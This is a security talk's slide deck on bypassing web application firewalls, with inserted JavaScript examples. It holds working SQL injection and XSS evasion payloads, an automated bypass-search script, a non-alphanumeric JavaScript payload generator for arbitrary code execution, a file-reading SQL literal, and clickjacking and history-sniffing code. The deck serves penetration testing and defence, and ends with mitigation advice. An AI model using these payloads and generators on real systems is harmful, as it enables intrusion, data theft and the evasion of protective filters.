Bypassing Web Application Firewalls (WAFs)

Ing. Pavol Lupták, CISSP, CEH
Lead Security Consultant

www.nethemba.com

Nethemba – All About Security
• Highly experienced certified IT security experts (CISSP, C|EH, SCSecA)
• Core business: all kinds of penetration tests, comprehensive web application security audits, local system and wifi security audits, security consulting, forensic analysis, secure VoIP, ultra-secure systems
• OWASP activists: leaders of the Slovak/Czech OWASP chapters, co-authors of the most recognized OWASP Testing Guide v3.0, working on the new version
• We are the only company in Slovakia/Czech Republic that offers:
  – Penetration tests and security audits of SAP
  – Security audits of smart RFID cards
  – Unique own and sponsored security research in many areas (see our references: vulnerabilities in public transport SMS tickets, cracking of the most widely used Mifare Classic RFID cards)

What are WAFs?
• Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks
• Usually contain a lot of complex regular-expression rules that requests are matched against
• Support special features such as cookie encryption, CSRF protection, etc.
• Except for the free mod_security they are quite expensive (and there is often no correlation between the price and the filtering capabilities)

WAF implementations
• Usually deployed in "blacklisting mode", which is more vulnerable to bypasses and targeted attacks
• The application "context" (the type of input each parameter accepts) must be known before the more secure "whitelisting mode" can be deployed
• All WAFs can be bypassed
• A WAF is just a workaround, but from a security point of view it can be cost-effective

WAF filter rules
• Directly reflect the WAF's effectiveness
• For most WAF vendors they are closely guarded secrets; determined attackers are nevertheless able to bypass them without ever seeing the actual rules
• Open-source WAFs (mod_security, PHPIDS) have open-source rules, which allows more scrutiny by skilled penetration testers

Typical WAF bypasses

Blocked attack                           Undetected modification
---------------------------------------  ---------------------------------------------
'or 1=1--                                ' or 2=2--
alert(0)                                 %00alert(0)
<script>alert(0)</script>                <script type=vbscript>MsgBox(0)</script>
' or ''''='r                             '/**/OR/**/''''='
<script>alert(0)</script>                <img src="x:x" onerror="alert(0)"></img>
<img src=x:x onerror=alert(0)//></img>   <img src=http://url onload=alert(0)//></img>
1 or 1=1                                 (1)or(1)=(1)
eval(name)                               x=this.name
                                         X(0?$:name+1)

Yes, a WAF may also be vulnerable!
• A WAF also increases the attack surface of the target organization
• A WAF may itself be the target of, and vulnerable to, attacks: XSS, SQL injection, denial of service, remote code execution
• Such vulnerabilities have been found in all types of WAF products(!)

Typical bypass flow
1. Find out which characters / sequences the WAF allows
2. Make an obfuscated version of your injected payload
3. Test it and watch the WAF/application response
4. If it does not work, modify it and go back to step 2

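The four steps above run against a toy blacklist filter, as an added example (not code from the slides). The two rule sets, the candidate generator and the token list are constructed here for illustration and are not any vendor's rules:

```javascript
// Toy blacklist "WAF": a request is blocked if any rule's regex matches it.
// NAIVE_RULES is the kind of rule the bypass table defeats; TIGHTER_RULES is what
// a vendor might ship after seeing ' or 2=2-- get through. Both are constructed here.
const NAIVE_RULES = [
  { name: 'sqli-tautology', re: /'\s*or\s+1\s*=\s*1/i },
];
const TIGHTER_RULES = [
  { name: 'sqli-tautology', re: /'\s*or\s+(\w+)\s*=\s*\1/i }, // any n=n, not only 1=1
  { name: 'sqli-comment',   re: /--|#/ },                     // trailing comment markers
];

// Names of the rules that fire on a given input (empty array: the input passes).
function blockedBy(rules, input) {
  return rules.filter(r => r.re.test(input)).map(r => r.name);
}

// Step 1: learn which building blocks pass on their own.
function probe(rules, tokens) {
  return tokens.filter(t => blockedBy(rules, t).length === 0);
}

// Step 2: produce semantically equivalent variants of one injection by combining
// independent choices (whitespace substitute, tautology, comment terminator).
function* sqlTautologies() {
  const spaces = [' ', '/**/', '\t'];
  const truths = ['1=1', '2=2', "'a'='a'", '(1)=(1)'];
  const tails  = ['--', '#', '/*'];
  for (const s of spaces)
    for (const t of truths)
      for (const c of tails)
        yield `'${s}or${s}${t}${c}`;
}

// Steps 3 and 4: test candidates in order and stop at the first one the filter misses.
function findBypass(rules, candidates) {
  for (const p of candidates) {
    if (blockedBy(rules, p).length === 0) return p;
  }
  return null;
}

// Demo
console.log('allowed tokens:', probe(TIGHTER_RULES, ["'", '--', '#', '/**/', 'or']));
console.log('naive bypass:  ', findBypass(NAIVE_RULES, sqlTautologies()));
console.log('tighter bypass:', findBypass(TIGHTER_RULES, sqlTautologies()));
```

Against the naive rule the loop stops at the table's own answer, ' or 2=2--. The tighter rule set closes that hole and the comment markers, yet a different tautology with a different terminator (' or 'a'='a'/*) still gets through: every blacklist fix invites the next variant, which is the argument for per-parameter whitelisting.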
Javascript obfuscation
• Javascript has very powerful features
• A Javascript payload is what XSS attacks deliver
• It is full of evals, expression closures, generator expressions, iterators, special characters and shortcuts
• Supports many encodings (Unicode multibyte characters, hexadecimal, octal, and combinations of all of them)
• Supports XOR, "encryption", Base64

Non-alphanumeric javascript code
• Even if only a few characters are allowed it is possible to construct fully functional code:

_=[]|[];$=_++;__=(_<<_);___=(_<<_)+_;____=__+__;_____=__+___;
// _=1  $=0  __=2  ___=3  ____=4  _____=5
$$=({}+"")[_____]+({}+"")[_]+({}[$]+"")[_]+(($!=$)+"")[___]+(($==$)+"")[$]+(($==$)+"")[_]+(($==$)+"")[__]+({}+"")[_____]+(($==$)+"")[$]+({}+"")[_]+(($==$)+"")[_];
// $$ = "constructor" (letters taken from "[object Object]", "undefined", "false", "true")
$$$=(($!=$)+"")[_]+(($!=$)+"")[__]+(($==$)+"")[___]+(($==$)+"")[_]+(($==$)+"")[$];
// $$$ = "alert"
$_$=({}+"")[+_____]+({}+"")[_]+({}+"")[_]+(($!=$)+"")[__]+({}+"")[__+_____]+({}+"")[_____]+({}+"")[_]+({}[$]+"")[__]+(($==$)+"")[___];
// $_$ = "cool code"
($)[$$][$$]($$$+"('"+$_$+"')")()
// (0).constructor.constructor("alert('cool code')")()

([,Á,È,ª,É,,Ó]=!{}+{},[[Ç,µ]=!!Á+Á][ª+Ó+µ+Ç])()[Á+È+É+µ+Ç](-~Á)
// destructures "false[object Object]" and "truea" into single letters, calls [].sort without a
// receiver to obtain window (old Firefox only), then window.alert(1); note the identifiers are
// Unicode letters, so this is "non-alphanumeric" only for an ASCII-centric filter

Let's bypass WAF!
• Example situation: the WAF blocks alphabetic characters and digits (probably not a very realistic situation, just a proof of concept :-)
• It allows only a few special characters: (){}_=[];$"!+<>
• Let's generate fully non-alphanumeric javascript code!

Possibilities of the Javascript language
• We can use numbers to obtain a single character from a string, e.g. index zero for the first character: "abc"[0]
• We can use addition (+), subtraction (-), multiplication (*), division (/), modulus (%), increment (++), decrement (--)
• Mathematical operators perform automatic numeric conversion and string operators perform automatic string conversion

Sources of different alphanumeric characters in Javascript

Javascript object / error state   String result
--------------------------------  -----------------
{}+''                             "[object Object]"
+[][+[]]                          "NaN"
[][+[]]+[]                        "undefined"
[![]]+[]                          "false"
[!![]]+[]                         "true"

(Use {} in expression position, e.g. x={}+'' or ({}+''); at the start of a statement {} is parsed as an empty block.)

Shortest possible ways to create zero without using numbers

Characters   Result
----------   ------
+[]          0
+''          0
+""          0
-[]          0 (strictly -0, which indexes strings the same as 0)
-''          0 (-0)
-""          0 (-0)

Generating numbers
+[]                              // 0
++[[]][+[]]                      // 1
+!+[]                            // 1
++[++[[]][+[]]][+[]]             // 2
!+[]+!+[]                        // 2
++[++[++[[]][+[]]][+[]]][+[]]    // 3
!+[]+!+[]+!+[]                   // 3

Gain alpha characters without directly using them
• When we define a Javascript object with the object literal and concatenate it with a string, the result is [object Object]
_={}+''; // [object Object]
alert(_[1]) // returns the 'o' character

Generate the string "alert" without using any alphanumeric characters
• Let's start with 'a'
• Which Javascript value contains 'a'?
• We can use 'NaN' (Not a Number)
• Index an empty array at 0 (undefined) and convert it to a number (NaN)
+[][+[]] // result: NaN

Generating the 'a' character
'NaN'[1] is 'a'
++[[]][+[]]                  // 1
+[][+[]]+[]                  // string "NaN"
(+[][+[]]+[])[++[[]][+[]]]   // 'a'
• We have the character 'a'

Generating the 'l' character
• Use boolean false
• We can use the ! (NOT) operator; an empty array is truthy, so ![] is false (loose comparison is also usable: ''==0 is true)
• Wrap the boolean in [] and concatenate with [] to convert it to a string
([![]]+[]) // string "false"

Generating the 'l' character
++[++[[]][+[]]][+[]]                            // 2
([![]]+[])                                      // string "false"
'false'[2] = ([![]]+[])[++[++[[]][+[]]][+[]]]   // 'l'
• We have the 'l' character!

Generating the 'e' character
• It's easy, we can use boolean true
([!![]]+[])                                             // string 'true'
++[++[++[[]][+[]]][+[]]][+[]]                           // 3
'true'[3] = ([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]  // 'e'
• And we have the 'e' character!

Generating the 'r' character
• It's easy, we can use boolean true
([!![]]+[])                            // string 'true'
++[[]][+[]]                            // 1
'true'[1] = ([!![]]+[])[++[[]][+[]]]   // 'r'
• And we have the 'r' character!

Generating the 't' character
• It's easy, we can use boolean true
([!![]]+[])                    // string 'true'
+[]                            // 0
'true'[0] = ([!![]]+[])[+[]]   // 't'
• And we have the 't' character!

And now we have the 'alert' string!
(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]
// string 'alert'  ('a' from "NaN", 'l' from "false", 'e', 'r', 't' from "true")

How to execute the code of our choice?
• We need to obtain the window object to access all of its properties
• If you can reach a constructor, you can reach the Function constructor and execute arbitrary code
• The shortest way to get window (in the browsers of the time) was:
alert((1,[].sort)()) // shows the window object!
• Worked in all browsers except IE
• Caveat: this relied on Array.prototype.sort being called without a receiver and returning the global object. ES5-conformant engines throw a TypeError instead ("Array.prototype.sort called on null or undefined"), so in current browsers the [].constructor.constructor route shown two slides later is the one that still works

How to generate the 'sort' string
• We know how to generate the string 'alert'
• We need to generate the string 'sort'
'false'[3] = ([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]   // 's'
• We can get 'o' from []+{} ("[object Object]")
([]+{})[++[[]][+[]]]   // 'o'
• We have already generated 'r' and 't'

And now we have the 'sort' string
([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]
// string 'sort'

Let's build it together – call alert(1)
(1,[].sort)().alert(1)
• After replacing the number 1 and all alphabetic characters with their obfuscated versions we get:
([],[][([![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([]+{})[++[[]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]])()[(+[][+[]]+[])[++[[]][+[]]]+([![]]+[])[++[++[[]][+[]]][+[]]]+([!![]]+[])[++[++[++[[]][+[]]][+[]]][+[]]]+([!![]]+[])[++[[]][+[]]]+([!![]]+[])[+[]]](++[[]][+[]])
// calls alert(1)!  The ([],[][...'sort'...])() prefix is the (1,[].sort)() window trick, so this form needs a browser of that era.

How to call any arbitrary Javascript function
• Using the array constructor: [].constructor is Array and Array.constructor is Function, so accessing the constructor twice from an array object returns Function:
[].constructor.constructor("alert(1)")()
• We still need to generate the letters 'c', 'n', 'u'; they can be taken from the string form of the [].sort function:
function sort() { [native code] }

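The whole construction, from numbers to a Function-constructor call, as an added example in JavaScript (not code from the slides). It goes beyond the slides by spelling any string from the same sources, taking 'c', 'n' and 'u' from "undefined" and "[object Object]" as well as from the [].sort string, and by using the [].constructor.constructor route so that it runs in current engines, where the (1,[].sort)() window trick throws. The names num, strExpr and buildCall are this example's own:

```javascript
// Generator for code written only with the characters [ ] ( ) + ! { }.
// Method, as on the slides: coerce built-in values to strings and index them
// with numbers built from +[] and !+[].

const ALPHABET = /^[\[\]()+!{}]+$/;

// A non-negative integer as an expression over the alphabet:
//   +[] is 0, +!+[] is 1 (!0 is true, +true is 1), +!+[]+!+[] is 2, ...
function num(n) {
  if (n === 0) return '+[]';
  return '+!+[]' + '+!+[]'.repeat(n - 1);
}

// Strings the engine produces from non-alphanumeric expressions (the slides' table).
const BASE_SOURCES = [
  ['(+[][+[]]+[])', 'NaN'],          // [][0] is undefined, +undefined is NaN
  ['([![]]+[])',    'false'],        // ![] is false; [false]+[] is "false"
  ['([!![]]+[])',   'true'],
  ['([][[]]+[])',   'undefined'],    // [][""] is undefined
  ['([]+{})',       '[object Object]'],
];

// [].sort stringified adds "(", ")", " ", "{", "}", "v" and more. The text is
// engine-dependent (V8 gives "function sort() { [native code] }"), so it is read
// from the engine this runs in; a payload for another engine must be built there.
// 'sort' itself is spelled from the base sources.
let sources = null;
function allSources() {
  if (sources === null) {
    const sortExpr = `([][${strExpr('sort', BASE_SOURCES)}]+[])`;
    sources = [...BASE_SOURCES, [sortExpr, String([].sort)]];
  }
  return sources;
}

// Expression for one character: digits via number-to-string coercion ((+!+[]+[]) is "1"),
// everything else by indexing the first source string that contains it.
function charExpr(ch, srcs) {
  if (/^[0-9]$/.test(ch)) return `(${num(+ch)}+[])`;
  for (const [expr, text] of srcs) {
    const i = text.indexOf(ch);
    if (i !== -1) return `${expr}[${num(i)}]`;
  }
  throw new Error(`no non-alphanumeric source for ${JSON.stringify(ch)}`);
}

// Expression for a whole string: one-character strings joined with +.
function strExpr(s, srcs = allSources()) {
  return Array.from(s, ch => charExpr(ch, srcs)).join('+');
}

// [].constructor.constructor(body)() spelled out, i.e. Function(body)().
function buildCall(body) {
  const ctor = strExpr('constructor');
  return `[][${ctor}][${ctor}](${strExpr(body)})()`;
}

// Demo: a non-alphanumeric alert(1)
const payload = buildCall('alert(1)');
console.log(payload);
console.log(payload.length + ' chars, alphabet only: ' + ALPHABET.test(payload));
```

Paste the printed payload into a browser console to see the alert; the ALPHABET check is the practical test that the output really contains nothing a filter on letters and digits would see.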
SQL obfuscation
• What is obfuscation of an SQL injection vector?
• Different DBMSs have different SQL syntax; most support Unicode, Base64, hex, octal and binary representations, escaping, hashing algorithms (MD5, SHA-1)
• Many "blacklisted" characters can be replaced by functional alternatives (e.g. the 0xA0 byte, which MySQL accepts as whitespace, in place of a blocked space)
• Obfuscated comments: it is difficult to determine what is a comment and what is not

SQL obfuscation examples
SELECT CONCAT(char(x'70617373',b'1110111011011110111001001100100'))
  -- the two literals encode the bytes of "pass" and "word"
s/*/e/**//*e*//*/l/*le*c*//*/ect~~/**/1
SELECT LOAD_FILE(0x633A5C626F6F742E696E69)   (M = MySQL; the hex literal encodes "c:\boot.ini")
SELECT(extractvalue(0x3C613E61646D696E3C2F613, 0x2F61))

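The literal forms on this slide, encoded and decoded both ways, as an added example (not code from the slides). The function names are this example's own; the hex and bit literals it checks are the ones printed on the slide:

```javascript
// Alternative MySQL literal forms for the same bytes. The encoders produce a
// representation that contains no quotes or letters of the original string; the
// decoder recovers the bytes so a tester can read an obfuscated vector.

function bytesOf(s) {
  return Array.from(s, c => c.charCodeAt(0) & 0xff);   // ASCII / Latin-1 payloads
}

// 0x70617373 : hexadecimal literal (a binary string in string context)
function toHexLiteral(s) {
  return '0x' + bytesOf(s).map(b => b.toString(16).padStart(2, '0').toUpperCase()).join('');
}

// x'70617373' : the same bytes in standard SQL notation (needs an even digit count)
function toXLiteral(s) {
  return "x'" + toHexLiteral(s).slice(2) + "'";
}

// b'1110111...' : bit literal; MySQL pads it on the left to whole bytes, so leading
// zero bits may be dropped (the slide's literal for "word" is 31 bits long)
function toBitLiteral(s) {
  const bits = bytesOf(s).map(b => b.toString(2).padStart(8, '0')).join('');
  return "b'" + bits.replace(/^0+/, '') + "'";
}

// CHAR(112,97,115,115) : decimal code points, no quotes at all
function toCharCall(s) {
  return 'CHAR(' + bytesOf(s).join(',') + ')';
}

// Decode any of the four forms back to the string it denotes.
function decodeLiteral(lit) {
  let m;
  if ((m = /^0x([0-9a-f]+)$/i.exec(lit))) {
    // MySQL treats an odd-length 0x literal as having an extra leading 0
    const hex = m[1].length % 2 ? '0' + m[1] : m[1];
    return hex.match(/../g).map(h => String.fromCharCode(parseInt(h, 16))).join('');
  }
  if ((m = /^x'([0-9a-f]+)'$/i.exec(lit))) {
    if (m[1].length % 2) throw new Error("x'...' literals need an even number of digits");
    return m[1].match(/../g).map(h => String.fromCharCode(parseInt(h, 16))).join('');
  }
  if ((m = /^b'([01]+)'$/i.exec(lit))) {
    const bits = m[1].padStart(Math.ceil(m[1].length / 8) * 8, '0');
    return bits.match(/.{8}/g).map(b => String.fromCharCode(parseInt(b, 2))).join('');
  }
  if ((m = /^char\(([\d,\s]+)\)$/i.exec(lit))) {
    return m[1].split(',').map(n => String.fromCharCode(parseInt(n, 10))).join('');
  }
  throw new Error('unrecognised literal: ' + lit);
}

// Demo with the slide's literals
console.log(decodeLiteral("x'70617373'") + decodeLiteral("b'1110111011011110111001001100100'"));
console.log(decodeLiteral('0x633A5C626F6F742E696E69'));
console.log(toHexLiteral('c:\\boot.ini'), toBitLiteral('word'), toCharCall('pass'));
```

The decoder is the half a reviewer or a detection engineer needs: a rule that only looks for the literal string it is worried about never sees it once the bytes arrive as 0x..., b'...' or CHAR(...), so normalising literals before matching is the minimum a blacklist has to do.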
New SQL features
• MySQL and PostgreSQL support XML functions:
SELECT UpdateXML('<script x=_></script>', '/script/@x', 'src=//0x.lv');
• HTML5-era browsers offered a local SQL database (Web SQL, the openDatabase object, backed by SQLite) that could be misused for persistent XSS and local SQL injection attacks; Web SQL was never standardized and has since been dropped by browsers

Existing obfuscation tools
• Hackvertor http://hackvertor.co.uk/public
• HackBar https://addons.mozilla.org/en-US/firefox/addon/hack
• Malzilla http://malzilla.sourceforge.net/
• Your imagination :)

Summary
• WAFs are just workarounds!
• The best solution is to care about security in every SDLC phase and strictly validate all inputs and outputs in the application
• Use whitelisting instead of blacklisting (both in the application and in the WAF!)
• Use multilayer security: a three-tier architecture with a separate database layer, or database firewalls
• For SQL, use prepared statements
• For HTML, use HTML Purifier or the OWASP AntiSamy project

Special thanks to Mario Heiderich and Stefano Di Paola

UI redressing attacks – clickjacking
<style>
iframe { filter: alpha(opacity=0); opacity: 0;
         position: absolute; top: 0px; left: 0px;
         height: 300px; width: 250px; }
img    { position: absolute; top: 0px; left: 0px;
         height: 300px; width: 250px; }
</style>
<img src="WHAT THE USER SEES"/>
<iframe src="WHAT THE USER IS ACTUALLY INTERACTING WITH"></iframe>

Clickjacking protection
• Block framing with the X-Frame-Options: DENY response header (or SAMEORIGIN if the site frames its own pages)
• Or, in the page itself, a frame-busting script (weaker: it does nothing where script is disabled or the frame is sandboxed):
<body>
<script>
if (top!=self) document.write('<plaintext>');
</script>
...

CSS history attack
<style>
a { position: relative; }
a:visited { position: absolute; }
</style>
<a id="v" href="http://www.google.com/">Google</a>
<script>
var l=document.getElementById("v");
var c=getComputedStyle(l).position;
c=="absolute"?alert("visited"):alert("not visited");
</script>

CSS history exploitation methods
• Social network deanonymization attacks
• Local brute force of session IDs / CSRF tokens that appear in URLs
• LAN scanners
• Fixed in Firefox 4.0 (getComputedStyle no longer reveals :visited styling); the other browsers current at the time of this talk were still vulnerable, and all major browsers have since adopted the same mitigation


Contenu connexe

Tendances

Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)
Damien Seguy
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola
drewz lin
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
Aleksandr Yampolskiy
 

Tendances (20)

Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)Php Code Audits (PHP UK 2010)
Php Code Audits (PHP UK 2010)
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Php Security By Mugdha And Anish
Php Security By Mugdha And AnishPhp Security By Mugdha And Anish
Php Security By Mugdha And Anish
 
Application Security around OWASP Top 10
Application Security around OWASP Top 10Application Security around OWASP Top 10
Application Security around OWASP Top 10
 
Xss is more than a simple threat
Xss is more than a simple threatXss is more than a simple threat
Xss is more than a simple threat
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
jQuery introduction
jQuery introductionjQuery introduction
jQuery introduction
 
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
XSS Attacks Exploiting XSS Filter by Masato Kinugawa - CODE BLUE 2015
 
Frontends w ithout javascript
Frontends w ithout javascriptFrontends w ithout javascript
Frontends w ithout javascript
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Web security
Web securityWeb security
Web security
 
Javascript and Jquery Best practices
Javascript and Jquery Best practicesJavascript and Jquery Best practices
Javascript and Jquery Best practices
 
Introduction to PHP Lecture 1
Introduction to PHP Lecture 1Introduction to PHP Lecture 1
Introduction to PHP Lecture 1
 
Intro to computer vision in .net update
Intro to computer vision in .net   updateIntro to computer vision in .net   update
Intro to computer vision in .net update
 
My app is secure... I think
My app is secure... I thinkMy app is secure... I think
My app is secure... I think
 
Appsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaolaAppsec usa2013 js_libinsecurity_stefanodipaola
Appsec usa2013 js_libinsecurity_stefanodipaola
 
Basics of Java Script (JS)
Basics of Java Script (JS)Basics of Java Script (JS)
Basics of Java Script (JS)
 
PHP security audits
PHP security auditsPHP security audits
PHP security audits
 
Eight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programsEight simple rules to writing secure PHP programs
Eight simple rules to writing secure PHP programs
 

En vedette

Apache mod security 3.1
Apache mod security   3.1Apache mod security   3.1
Apache mod security 3.1
Hai Dinh Tuan
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection
Abhishek Singh
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewalls
EnclaveSecurity
 

En vedette (10)

Tapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered SecurityTapping Hackers for Continuous Security: That's Hacker-Powered Security
Tapping Hackers for Continuous Security: That's Hacker-Powered Security
 
Best Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application FirewallsBest Practices Guide: Introducing Web Application Firewalls
Best Practices Guide: Introducing Web Application Firewalls
 
Protecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And ModsecurityProtecting TYPO3 With Suhosin And Modsecurity
Protecting TYPO3 With Suhosin And Modsecurity
 
Apache mod security 3.1
Apache mod security   3.1Apache mod security   3.1
Apache mod security 3.1
 
Web Intrusion Detection
Web Intrusion Detection Web Intrusion Detection
Web Intrusion Detection
 
WAF in Scale
WAF in ScaleWAF in Scale
WAF in Scale
 
OWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia ModeOWASP ModSecurity Core Rules Paranoia Mode
OWASP ModSecurity Core Rules Paranoia Mode
 
Benefits of web application firewalls
Benefits of web application firewallsBenefits of web application firewalls
Benefits of web application firewalls
 
Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014Anatomy of an Attack - Sophos Day Belux 2014
Anatomy of an Attack - Sophos Day Belux 2014
 
Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)Radware - WAF (Web Application Firewall)
Radware - WAF (Web Application Firewall)
 

Similaire à Bypassing Web Application Firewalls

I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
Mario Heiderich
 
Slides
SlidesSlides
Slides
vti
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
Mario Heiderich
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
Yury Chemerkin
 

Similaire à Bypassing Web Application Firewalls (20)

JavaScript Obfuscation
JavaScript ObfuscationJavaScript Obfuscation
JavaScript Obfuscation
 
Java script obfuscation
Java script obfuscationJava script obfuscation
Java script obfuscation
 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
 
Web Application Defences
Web Application DefencesWeb Application Defences
Web Application Defences
 
Cross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with JavaCross Site Scripting (XSS) Defense with Java
Cross Site Scripting (XSS) Defense with Java
 
I thought you were my friend - Malicious Markup
I thought you were my friend - Malicious MarkupI thought you were my friend - Malicious Markup
I thought you were my friend - Malicious Markup
 
Slides
SlidesSlides
Slides
 
The top 10 security issues in web applications
The top 10 security issues in web applicationsThe top 10 security issues in web applications
The top 10 security issues in web applications
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Pascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax SecurityPascarello_Investigating JavaScript and Ajax Security
Pascarello_Investigating JavaScript and Ajax Security
 
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
MMT 29: "Hab Dich!" -- Wie Angreifer ganz ohne JavaScript an Deine wertvollen...
 
The Ultimate IDS Smackdown
The Ultimate IDS SmackdownThe Ultimate IDS Smackdown
The Ultimate IDS Smackdown
 
XSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkearyXSS Defence with @manicode and @eoinkeary
XSS Defence with @manicode and @eoinkeary
 
Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...Mario heiderich. got your nose! how to steal your precious data without using...
Mario heiderich. got your nose! how to steal your precious data without using...
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
 
Java Script ppt
Java Script pptJava Script ppt
Java Script ppt
 
[Poland] It's only about frontend
[Poland] It's only about frontend[Poland] It's only about frontend
[Poland] It's only about frontend
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Applications secure by default
Applications secure by defaultApplications secure by default
Applications secure by default
 
Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2Top Ten Java Defense for Web Applications v2
Top Ten Java Defense for Web Applications v2
 

Plus de OWASP (Open Web Application Security Project)

Plus de OWASP (Open Web Application Security Project) (16)

Paralelni polisweb
Paralelni poliswebParalelni polisweb
Paralelni polisweb
 
Nethemba - Writing exploits
Nethemba - Writing exploitsNethemba - Writing exploits
Nethemba - Writing exploits
 
Preco sa rozhodnut pre spolocnost Nethemba
Preco sa rozhodnut pre spolocnost NethembaPreco sa rozhodnut pre spolocnost Nethemba
Preco sa rozhodnut pre spolocnost Nethemba
 
Planning the OWASP Testing Guide v4
Planning the OWASP Testing Guide v4Planning the OWASP Testing Guide v4
Planning the OWASP Testing Guide v4
 
Nethemba metasploit
Nethemba metasploitNethemba metasploit
Nethemba metasploit
 
Sms ticket-hack4
Sms ticket-hack4Sms ticket-hack4
Sms ticket-hack4
 
Se linux course1
Se linux course1Se linux course1
Se linux course1
 
Real web-attack-scenario
Real web-attack-scenarioReal web-attack-scenario
Real web-attack-scenario
 
Practical web-attacks2
Practical web-attacks2Practical web-attacks2
Practical web-attacks2
 
Php sec
Php secPhp sec
Php sec
 
Nove trendy-zranitelnosti
Nove trendy-zranitelnostiNove trendy-zranitelnosti
Nove trendy-zranitelnosti
 
New web attacks-nethemba
New web attacks-nethembaNew web attacks-nethemba
New web attacks-nethemba
 
Nethemba profil
Nethemba profilNethemba profil
Nethemba profil
 
Mifare classic-slides
Mifare classic-slidesMifare classic-slides
Mifare classic-slides
 
1.nove trendy-zranitelnosti luptak
1.nove trendy-zranitelnosti luptak1.nove trendy-zranitelnosti luptak
1.nove trendy-zranitelnosti luptak
 
Nethemba profil
Nethemba profilNethemba profil
Nethemba profil
 

Dernier

Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
 

Dernier (20)

CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In PakistanCNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ..."I see eyes in my soup": How Delivery Hero implemented the safety system for ...
"I see eyes in my soup": How Delivery Hero implemented the safety system for ...
 
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
